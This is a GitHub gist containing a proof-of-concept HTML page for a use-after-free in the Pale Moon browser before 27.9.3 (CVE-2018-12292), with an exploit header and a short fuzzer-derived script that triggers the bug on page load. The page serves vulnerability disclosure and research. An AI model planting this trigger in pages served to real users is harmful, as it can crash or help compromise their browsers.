Skip to content

Instantly share code, notes, and snippets.

@berkgoksel

berkgoksel/PaleMoon_PoC.html

Created June 13, 2018 15:12
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save berkgoksel/bbae795cae748fffe76b93a424a47dc2 to your computer and use it in GitHub Desktop.
Save berkgoksel/bbae795cae748fffe76b93a424a47dc2 to your computer and use it in GitHub Desktop.
Download ZIP
Pale Moon Browser < 27.9.3 - Use After Free - Proof of Concept.html
Raw
PaleMoon_PoC.html
<!-- PaleMoon Browser - Proof of Concept -->
<!-- Exploit Title: Pale Moon Browser < 27.9.3 - Use After Free - Proof of Concept -->
<!-- Date: 13 Jun 2018 -->
<!-- Author - Berk Cem Goksel -->
<!-- Contact: twitter.com/berkcgoksel || bgoksel.com -->
<!-- Vendor Homepage: https://www.palemoon.org/ -->
<!-- Software Link: https://www.palemoon.org/palemoon-win32.shtml -->
<!-- Version: Versions prior to 27.9.3 (Tested versions: 27.9.0, 27.9.1, 27.9.2) -->
<!-- Tested on: Windows 10 -->
<!-- Category: Windows Remote Exploit -->
<!-- CVE : CVE-2018-12292 -->
<html>
<head>
<style>
</style>
<script>
function SetVariable(fuzzervars, var_name, var_type) {
fuzzervars[var_type] = var_name;
}
function jsfuzzer() {
var var_1 = var_2.getDistributedNodes();
SetVariable(var_1, 'NodeList');
}
</script>
</head>
<body onload=jsfuzzer()>
<!--beginhtml-->
<content id="var_2" loopend="1" default="" max="0" charset="ISO-2022-JP"></content>
<!--endhtml-->
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment